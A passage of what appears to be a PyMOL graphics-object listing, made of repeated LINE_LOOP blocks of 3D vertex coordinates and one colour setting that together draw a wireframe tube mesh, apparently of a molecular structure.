VERTEX, 14.264, 37.121, 23.034,
VERTEX, 14.647, 37.340, 23.267,
VERTEX, 14.196, 37.308, 22.920,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.647, 37.340, 23.267,
VERTEX, 14.196, 37.308, 22.920,
VERTEX, 14.579, 37.540, 23.177,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.196, 37.308, 22.920,
VERTEX, 14.579, 37.540, 23.177,
VERTEX, 14.036, 37.470, 22.953,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.579, 37.540, 23.177,
VERTEX, 14.036, 37.470, 22.953,
VERTEX, 14.415, 37.693, 23.227,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.036, 37.470, 22.953,
VERTEX, 14.415, 37.693, 23.227,
VERTEX, 13.879, 37.512, 23.116,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.415, 37.693, 23.227,
VERTEX, 13.879, 37.512, 23.116,
VERTEX, 14.252, 37.710, 23.388,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.879, 37.512, 23.116,
VERTEX, 14.252, 37.710, 23.388,
VERTEX, 13.817, 37.410, 23.311,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.252, 37.710, 23.388,
VERTEX, 13.817, 37.410, 23.311,
VERTEX, 14.185, 37.580, 23.565,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.817, 37.410, 23.311,
VERTEX, 14.185, 37.580, 23.565,
VERTEX, 13.885, 37.223, 23.426,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.185, 37.580, 23.565,
VERTEX, 13.885, 37.223, 23.426,
VERTEX, 14.253, 37.380, 23.655,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.885, 37.223, 23.426,
VERTEX, 14.253, 37.380, 23.655,
VERTEX, 14.045, 37.061, 23.392,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.253, 37.380, 23.655,
VERTEX, 14.045, 37.061, 23.392,
VERTEX, 14.417, 37.227, 23.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.045, 37.061, 23.392,
VERTEX, 14.417, 37.227, 23.605,
VERTEX, 14.202, 37.019, 23.230,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.417, 37.227, 23.605,
VERTEX, 14.202, 37.019, 23.230,
VERTEX, 14.580, 37.210, 23.444,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.202, 37.019, 23.230,
VERTEX, 14.580, 37.210, 23.444,
VERTEX, 14.264, 37.121, 23.034,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.580, 37.210, 23.444,
VERTEX, 14.264, 37.121, 23.034,
VERTEX, 14.647, 37.340, 23.267,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.647, 37.340, 23.267,
VERTEX, 15.027, 37.497, 23.536,
VERTEX, 14.579, 37.540, 23.177,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.027, 37.497, 23.536,
VERTEX, 14.579, 37.540, 23.177,
VERTEX, 14.967, 37.712, 23.485,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.579, 37.540, 23.177,
VERTEX, 14.967, 37.712, 23.485,
VERTEX, 14.415, 37.693, 23.227,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.967, 37.712, 23.485,
VERTEX, 14.415, 37.693, 23.227,
VERTEX, 14.801, 37.855, 23.554,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.415, 37.693, 23.227,
VERTEX, 14.801, 37.855, 23.554,
VERTEX, 14.252, 37.710, 23.388,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.801, 37.855, 23.554,
VERTEX, 14.252, 37.710, 23.388,
VERTEX, 14.626, 37.841, 23.701,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.252, 37.710, 23.388,
VERTEX, 14.626, 37.841, 23.701,
VERTEX, 14.185, 37.580, 23.565,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.626, 37.841, 23.701,
VERTEX, 14.185, 37.580, 23.565,
VERTEX, 14.544, 37.679, 23.842,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.185, 37.580, 23.565,
VERTEX, 14.544, 37.679, 23.842,
VERTEX, 14.253, 37.380, 23.655,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.544, 37.679, 23.842,
VERTEX, 14.253, 37.380, 23.655,
VERTEX, 14.604, 37.463, 23.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.253, 37.380, 23.655,
VERTEX, 14.604, 37.463, 23.893,
VERTEX, 14.417, 37.227, 23.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.604, 37.463, 23.893,
VERTEX, 14.417, 37.227, 23.605,
VERTEX, 14.771, 37.320, 23.824,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.417, 37.227, 23.605,
VERTEX, 14.771, 37.320, 23.824,
VERTEX, 14.580, 37.210, 23.444,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.771, 37.320, 23.824,
VERTEX, 14.580, 37.210, 23.444,
VERTEX, 14.946, 37.334, 23.676,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.580, 37.210, 23.444,
VERTEX, 14.946, 37.334, 23.676,
VERTEX, 14.647, 37.340, 23.267,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.946, 37.334, 23.676,
VERTEX, 14.647, 37.340, 23.267,
VERTEX, 15.027, 37.497, 23.536,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.027, 37.497, 23.536,
VERTEX, 15.347, 37.544, 23.823,
VERTEX, 14.967, 37.712, 23.485,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.347, 37.544, 23.823,
VERTEX, 14.967, 37.712, 23.485,
VERTEX, 15.300, 37.769, 23.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.967, 37.712, 23.485,
VERTEX, 15.300, 37.769, 23.821,
VERTEX, 14.801, 37.855, 23.554,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.300, 37.769, 23.821,
VERTEX, 14.801, 37.855, 23.554,
VERTEX, 15.133, 37.901, 23.907,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.801, 37.855, 23.554,
VERTEX, 15.133, 37.901, 23.907,
VERTEX, 14.626, 37.841, 23.701,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.133, 37.901, 23.907,
VERTEX, 14.626, 37.841, 23.701,
VERTEX, 14.943, 37.862, 24.030,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.626, 37.841, 23.701,
VERTEX, 14.943, 37.862, 24.030,
VERTEX, 14.544, 37.679, 23.842,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.943, 37.862, 24.030,
VERTEX, 14.544, 37.679, 23.842,
VERTEX, 14.842, 37.676, 24.119,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.544, 37.679, 23.842,
VERTEX, 14.842, 37.676, 24.119,
VERTEX, 14.604, 37.463, 23.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.842, 37.676, 24.119,
VERTEX, 14.604, 37.463, 23.893,
VERTEX, 14.888, 37.451, 24.120,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.604, 37.463, 23.893,
VERTEX, 14.888, 37.451, 24.120,
VERTEX, 14.771, 37.320, 23.824,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.888, 37.451, 24.120,
VERTEX, 14.771, 37.320, 23.824,
VERTEX, 15.055, 37.319, 24.034,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.771, 37.320, 23.824,
VERTEX, 15.055, 37.319, 24.034,
VERTEX, 14.946, 37.334, 23.676,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.055, 37.319, 24.034,
VERTEX, 14.946, 37.334, 23.676,
VERTEX, 15.245, 37.358, 23.911,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.946, 37.334, 23.676,
VERTEX, 15.245, 37.358, 23.911,
VERTEX, 15.027, 37.497, 23.536,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.245, 37.358, 23.911,
VERTEX, 15.027, 37.497, 23.536,
VERTEX, 15.347, 37.544, 23.823,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.347, 37.544, 23.823,
VERTEX, 15.609, 37.507, 24.118,
VERTEX, 15.300, 37.769, 23.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.609, 37.507, 24.118,
VERTEX, 15.300, 37.769, 23.821,
VERTEX, 15.573, 37.730, 24.162,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.300, 37.769, 23.821,
VERTEX, 15.573, 37.730, 24.162,
VERTEX, 15.133, 37.901, 23.907,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.573, 37.730, 24.162,
VERTEX, 15.133, 37.901, 23.907,
VERTEX, 15.407, 37.850, 24.264,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.133, 37.901, 23.907,
VERTEX, 15.407, 37.850, 24.264,
VERTEX, 14.943, 37.862, 24.030,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.407, 37.850, 24.264,
VERTEX, 14.943, 37.862, 24.030,
VERTEX, 15.207, 37.799, 24.365,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.943, 37.862, 24.030,
VERTEX, 15.207, 37.799, 24.365,
VERTEX, 14.842, 37.676, 24.119,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.207, 37.799, 24.365,
VERTEX, 14.842, 37.676, 24.119,
VERTEX, 15.091, 37.605, 24.405,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.842, 37.676, 24.119,
VERTEX, 15.091, 37.605, 24.405,
VERTEX, 14.888, 37.451, 24.120,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.091, 37.605, 24.405,
VERTEX, 14.888, 37.451, 24.120,
VERTEX, 15.127, 37.382, 24.362,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.888, 37.451, 24.120,
VERTEX, 15.127, 37.382, 24.362,
VERTEX, 15.055, 37.319, 24.034,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.127, 37.382, 24.362,
VERTEX, 15.055, 37.319, 24.034,
VERTEX, 15.293, 37.261, 24.260,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.055, 37.319, 24.034,
VERTEX, 15.293, 37.261, 24.260,
VERTEX, 15.245, 37.358, 23.911,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.293, 37.261, 24.260,
VERTEX, 15.245, 37.358, 23.911,
VERTEX, 15.493, 37.313, 24.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.245, 37.358, 23.911,
VERTEX, 15.493, 37.313, 24.159,
VERTEX, 15.347, 37.544, 23.823,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.493, 37.313, 24.159,
VERTEX, 15.347, 37.544, 23.823,
VERTEX, 15.609, 37.507, 24.118,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.609, 37.507, 24.118,
VERTEX, 15.823, 37.418, 24.418,
VERTEX, 15.573, 37.730, 24.162,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.823, 37.418, 24.418,
VERTEX, 15.573, 37.730, 24.162,
VERTEX, 15.794, 37.633, 24.495,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.573, 37.730, 24.162,
VERTEX, 15.794, 37.633, 24.495,
VERTEX, 15.407, 37.850, 24.264,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.794, 37.633, 24.495,
VERTEX, 15.407, 37.850, 24.264,
VERTEX, 15.629, 37.742, 24.612,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.407, 37.850, 24.264,
VERTEX, 15.629, 37.742, 24.612,
VERTEX, 15.207, 37.799, 24.365,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.629, 37.742, 24.612,
VERTEX, 15.207, 37.799, 24.365,
VERTEX, 15.426, 37.683, 24.700,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.207, 37.799, 24.365,
VERTEX, 15.426, 37.683, 24.700,
VERTEX, 15.091, 37.605, 24.405,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.426, 37.683, 24.700,
VERTEX, 15.091, 37.605, 24.405,
VERTEX, 15.302, 37.489, 24.708,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.091, 37.605, 24.405,
VERTEX, 15.302, 37.489, 24.708,
VERTEX, 15.127, 37.382, 24.362,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.302, 37.489, 24.708,
VERTEX, 15.127, 37.382, 24.362,
VERTEX, 15.332, 37.275, 24.631,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.127, 37.382, 24.362,
VERTEX, 15.332, 37.275, 24.631,
VERTEX, 15.293, 37.261, 24.260,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.332, 37.275, 24.631,
VERTEX, 15.293, 37.261, 24.260,
VERTEX, 15.496, 37.165, 24.514,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.293, 37.261, 24.260,
VERTEX, 15.496, 37.165, 24.514,
VERTEX, 15.493, 37.313, 24.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.496, 37.165, 24.514,
VERTEX, 15.493, 37.313, 24.159,
VERTEX, 15.700, 37.225, 24.426,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.493, 37.313, 24.159,
VERTEX, 15.700, 37.225, 24.426,
VERTEX, 15.609, 37.507, 24.118,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.700, 37.225, 24.426,
VERTEX, 15.609, 37.507, 24.118,
VERTEX, 15.823, 37.418, 24.418,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.823, 37.418, 24.418,
VERTEX, 15.999, 37.311, 24.721,
VERTEX, 15.794, 37.633, 24.495,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.999, 37.311, 24.721,
VERTEX, 15.794, 37.633, 24.495,
VERTEX, 15.970, 37.517, 24.818,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.794, 37.633, 24.495,
VERTEX, 15.970, 37.517, 24.818,
VERTEX, 15.629, 37.742, 24.612,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.970, 37.517, 24.818,
VERTEX, 15.629, 37.742, 24.612,
VERTEX, 15.808, 37.615, 24.948,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.629, 37.742, 24.612,
VERTEX, 15.808, 37.615, 24.948,
VERTEX, 15.426, 37.683, 24.700,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.808, 37.615, 24.948,
VERTEX, 15.426, 37.683, 24.700,
VERTEX, 15.606, 37.547, 25.034,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.426, 37.683, 24.700,
VERTEX, 15.606, 37.547, 25.034,
VERTEX, 15.302, 37.489, 24.708,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.606, 37.547, 25.034,
VERTEX, 15.302, 37.489, 24.708,
VERTEX, 15.484, 37.353, 25.027,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.302, 37.489, 24.708,
VERTEX, 15.484, 37.353, 25.027,
VERTEX, 15.332, 37.275, 24.631,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.484, 37.353, 25.027,
VERTEX, 15.332, 37.275, 24.631,
VERTEX, 15.512, 37.147, 24.930,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.332, 37.275, 24.631,
VERTEX, 15.512, 37.147, 24.930,
VERTEX, 15.496, 37.165, 24.514,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.512, 37.147, 24.930,
VERTEX, 15.496, 37.165, 24.514,
VERTEX, 15.674, 37.049, 24.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.496, 37.165, 24.514,
VERTEX, 15.674, 37.049, 24.800,
VERTEX, 15.700, 37.225, 24.426,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.674, 37.049, 24.800,
VERTEX, 15.700, 37.225, 24.426,
VERTEX, 15.876, 37.117, 24.714,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.700, 37.225, 24.426,
VERTEX, 15.876, 37.117, 24.714,
VERTEX, 15.823, 37.418, 24.418,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.876, 37.117, 24.714,
VERTEX, 15.823, 37.418, 24.418,
VERTEX, 15.999, 37.311, 24.721,
END,
COLOR, 0.000, 0.898, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 15.999, 37.311, 24.721,
VERTEX, 16.144, 37.217, 25.029,
VERTEX, 15.970, 37.517, 24.818,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.144, 37.217, 25.029,
VERTEX, 15.970, 37.517, 24.818,
VERTEX, 16.110, 37.418, 25.134,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.970, 37.517, 24.818,
VERTEX, 16.110, 37.418, 25.134,
VERTEX, 15.808, 37.615, 24.948,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.110, 37.418, 25.134,
VERTEX, 15.808, 37.615, 24.948,
VERTEX, 15.950, 37.503, 25.275,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.808, 37.615, 24.948,
VERTEX, 15.950, 37.503, 25.275,
VERTEX, 15.606, 37.547, 25.034,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.950, 37.503, 25.275,
VERTEX, 15.606, 37.547, 25.034,
VERTEX, 15.758, 37.422, 25.370,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.606, 37.547, 25.034,
VERTEX, 15.758, 37.422, 25.370,
VERTEX, 15.484, 37.353, 25.027,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.758, 37.422, 25.370,
VERTEX, 15.484, 37.353, 25.027,
VERTEX, 15.645, 37.221, 25.362,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.484, 37.353, 25.027,
VERTEX, 15.645, 37.221, 25.362,
VERTEX, 15.512, 37.147, 24.930,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.645, 37.221, 25.362,
VERTEX, 15.512, 37.147, 24.930,
VERTEX, 15.679, 37.020, 25.257,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.512, 37.147, 24.930,
VERTEX, 15.679, 37.020, 25.257,
VERTEX, 15.674, 37.049, 24.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.679, 37.020, 25.257,
VERTEX, 15.674, 37.049, 24.800,
VERTEX, 15.839, 36.935, 25.116,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.674, 37.049, 24.800,
VERTEX, 15.839, 36.935, 25.116,
VERTEX, 15.876, 37.117, 24.714,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.839, 36.935, 25.116,
VERTEX, 15.876, 37.117, 24.714,
VERTEX, 16.032, 37.017, 25.022,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.876, 37.117, 24.714,
VERTEX, 16.032, 37.017, 25.022,
VERTEX, 15.999, 37.311, 24.721,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.032, 37.017, 25.022,
VERTEX, 15.999, 37.311, 24.721,
VERTEX, 16.144, 37.217, 25.029,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.144, 37.217, 25.029,
VERTEX, 16.266, 37.165, 25.342,
VERTEX, 16.110, 37.418, 25.134,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.266, 37.165, 25.342,
VERTEX, 16.110, 37.418, 25.134,
VERTEX, 16.216, 37.365, 25.443,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.110, 37.418, 25.134,
VERTEX, 16.216, 37.365, 25.443,
VERTEX, 15.950, 37.503, 25.275,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.216, 37.365, 25.443,
VERTEX, 15.950, 37.503, 25.275,
VERTEX, 16.058, 37.436, 25.594,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.950, 37.503, 25.275,
VERTEX, 16.058, 37.436, 25.594,
VERTEX, 15.758, 37.422, 25.370,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.058, 37.436, 25.594,
VERTEX, 15.758, 37.422, 25.370,
VERTEX, 15.885, 37.335, 25.707,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.758, 37.422, 25.370,
VERTEX, 15.885, 37.335, 25.707,
VERTEX, 15.645, 37.221, 25.362,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.885, 37.335, 25.707,
VERTEX, 15.645, 37.221, 25.362,
VERTEX, 15.798, 37.123, 25.715,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.645, 37.221, 25.362,
VERTEX, 15.798, 37.123, 25.715,
VERTEX, 15.679, 37.020, 25.257,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.798, 37.123, 25.715,
VERTEX, 15.679, 37.020, 25.257,
VERTEX, 15.848, 36.923, 25.614,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.679, 37.020, 25.257,
VERTEX, 15.848, 36.923, 25.614,
VERTEX, 15.839, 36.935, 25.116,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.848, 36.923, 25.614,
VERTEX, 15.839, 36.935, 25.116,
VERTEX, 16.006, 36.853, 25.463,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.839, 36.935, 25.116,
VERTEX, 16.006, 36.853, 25.463,
VERTEX, 16.032, 37.017, 25.022,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.006, 36.853, 25.463,
VERTEX, 16.032, 37.017, 25.022,
VERTEX, 16.179, 36.953, 25.350,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.032, 37.017, 25.022,
VERTEX, 16.179, 36.953, 25.350,
VERTEX, 16.144, 37.217, 25.029,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.179, 36.953, 25.350,
VERTEX, 16.144, 37.217, 25.029,
VERTEX, 16.266, 37.165, 25.342,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.266, 37.165, 25.342,
VERTEX, 16.369, 37.182, 25.660,
VERTEX, 16.216, 37.365, 25.443,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.369, 37.182, 25.660,
VERTEX, 16.216, 37.365, 25.443,
VERTEX, 16.285, 37.378, 25.746,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.216, 37.365, 25.443,
VERTEX, 16.285, 37.378, 25.746,
VERTEX, 16.058, 37.436, 25.594,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.285, 37.378, 25.746,
VERTEX, 16.058, 37.436, 25.594,
VERTEX, 16.130, 37.431, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.058, 37.436, 25.594,
VERTEX, 16.130, 37.431, 25.906,
VERTEX, 15.885, 37.335, 25.707,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.130, 37.431, 25.906,
VERTEX, 15.885, 37.335, 25.707,
VERTEX, 15.993, 37.311, 26.047,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.885, 37.335, 25.707,
VERTEX, 15.993, 37.311, 26.047,
VERTEX, 15.798, 37.123, 25.715,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.993, 37.311, 26.047,
VERTEX, 15.798, 37.123, 25.715,
VERTEX, 15.956, 37.088, 26.085,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.798, 37.123, 25.715,
VERTEX, 15.956, 37.088, 26.085,
VERTEX, 15.848, 36.923, 25.614,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.956, 37.088, 26.085,
VERTEX, 15.848, 36.923, 25.614,
VERTEX, 16.039, 36.892, 25.999,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.848, 36.923, 25.614,
VERTEX, 16.039, 36.892, 25.999,
VERTEX, 16.006, 36.853, 25.463,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.039, 36.892, 25.999,
VERTEX, 16.006, 36.853, 25.463,
VERTEX, 16.195, 36.839, 25.838,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.006, 36.853, 25.463,
VERTEX, 16.195, 36.839, 25.838,
VERTEX, 16.179, 36.953, 25.350,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.195, 36.839, 25.838,
VERTEX, 16.179, 36.953, 25.350,
VERTEX, 16.332, 36.959, 25.698,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.179, 36.953, 25.350,
VERTEX, 16.332, 36.959, 25.698,
VERTEX, 16.266, 37.165, 25.342,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.332, 36.959, 25.698,
VERTEX, 16.266, 37.165, 25.342,
VERTEX, 16.369, 37.182, 25.660,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.369, 37.182, 25.660,
VERTEX, 16.464, 37.289, 25.990,
VERTEX, 16.285, 37.378, 25.746,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.464, 37.289, 25.990,
VERTEX, 16.285, 37.378, 25.746,
VERTEX, 16.332, 37.464, 26.057,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.285, 37.378, 25.746,
VERTEX, 16.332, 37.464, 26.057,
VERTEX, 16.130, 37.431, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.332, 37.464, 26.057,
VERTEX, 16.130, 37.431, 25.906,
VERTEX, 16.179, 37.497, 26.224,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.130, 37.431, 25.906,
VERTEX, 16.179, 37.497, 26.224,
VERTEX, 15.993, 37.311, 26.047,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.179, 37.497, 26.224,
VERTEX, 15.993, 37.311, 26.047,
VERTEX, 16.093, 37.369, 26.394,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.993, 37.311, 26.047,
VERTEX, 16.093, 37.369, 26.394,
VERTEX, 15.956, 37.088, 26.085,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.093, 37.369, 26.394,
VERTEX, 15.956, 37.088, 26.085,
VERTEX, 16.126, 37.153, 26.467,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.956, 37.088, 26.085,
VERTEX, 16.126, 37.153, 26.467,
VERTEX, 16.039, 36.892, 25.999,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.126, 37.153, 26.467,
VERTEX, 16.039, 36.892, 25.999,
VERTEX, 16.258, 36.978, 26.400,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.039, 36.892, 25.999,
VERTEX, 16.258, 36.978, 26.400,
VERTEX, 16.195, 36.839, 25.838,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.258, 36.978, 26.400,
VERTEX, 16.195, 36.839, 25.838,
VERTEX, 16.411, 36.944, 26.232,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.195, 36.839, 25.838,
VERTEX, 16.411, 36.944, 26.232,
VERTEX, 16.332, 36.959, 25.698,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.411, 36.944, 26.232,
VERTEX, 16.332, 36.959, 25.698,
VERTEX, 16.497, 37.073, 26.062,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.332, 36.959, 25.698,
VERTEX, 16.497, 37.073, 26.062,
VERTEX, 16.369, 37.182, 25.660,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.497, 37.073, 26.062,
VERTEX, 16.369, 37.182, 25.660,
VERTEX, 16.464, 37.289, 25.990,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.464, 37.289, 25.990,
VERTEX, 16.570, 37.511, 26.338,
VERTEX, 16.332, 37.464, 26.057,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.570, 37.511, 26.338,
VERTEX, 16.332, 37.464, 26.057,
VERTEX, 16.391, 37.644, 26.391,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.332, 37.464, 26.057,
VERTEX, 16.391, 37.644, 26.391,
VERTEX, 16.179, 37.497, 26.224,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.391, 37.644, 26.391,
VERTEX, 16.179, 37.497, 26.224,
VERTEX, 16.240, 37.652, 26.564,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.179, 37.497, 26.224,
VERTEX, 16.240, 37.652, 26.564,
VERTEX, 16.093, 37.369, 26.394,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.240, 37.652, 26.564,
VERTEX, 16.093, 37.369, 26.394,
VERTEX, 16.206, 37.530, 26.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.093, 37.369, 26.394,
VERTEX, 16.206, 37.530, 26.756,
VERTEX, 16.126, 37.153, 26.467,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.206, 37.530, 26.756,
VERTEX, 16.126, 37.153, 26.467,
VERTEX, 16.308, 37.349, 26.854,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.126, 37.153, 26.467,
VERTEX, 16.308, 37.349, 26.854,
VERTEX, 16.258, 36.978, 26.400,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.308, 37.349, 26.854,
VERTEX, 16.258, 36.978, 26.400,
VERTEX, 16.487, 37.216, 26.801,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.258, 36.978, 26.400,
VERTEX, 16.487, 37.216, 26.801,
VERTEX, 16.411, 36.944, 26.232,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.487, 37.216, 26.801,
VERTEX, 16.411, 36.944, 26.232,
VERTEX, 16.638, 37.208, 26.628,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.411, 36.944, 26.232,
VERTEX, 16.638, 37.208, 26.628,
VERTEX, 16.497, 37.073, 26.062,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.638, 37.208, 26.628,
VERTEX, 16.497, 37.073, 26.062,
VERTEX, 16.672, 37.330, 26.436,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.497, 37.073, 26.062,
VERTEX, 16.672, 37.330, 26.436,
VERTEX, 16.464, 37.289, 25.990,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.672, 37.330, 26.436,
VERTEX, 16.464, 37.289, 25.990,
VERTEX, 16.570, 37.511, 26.338,
END,
BEGIN, LINE_LOOP,
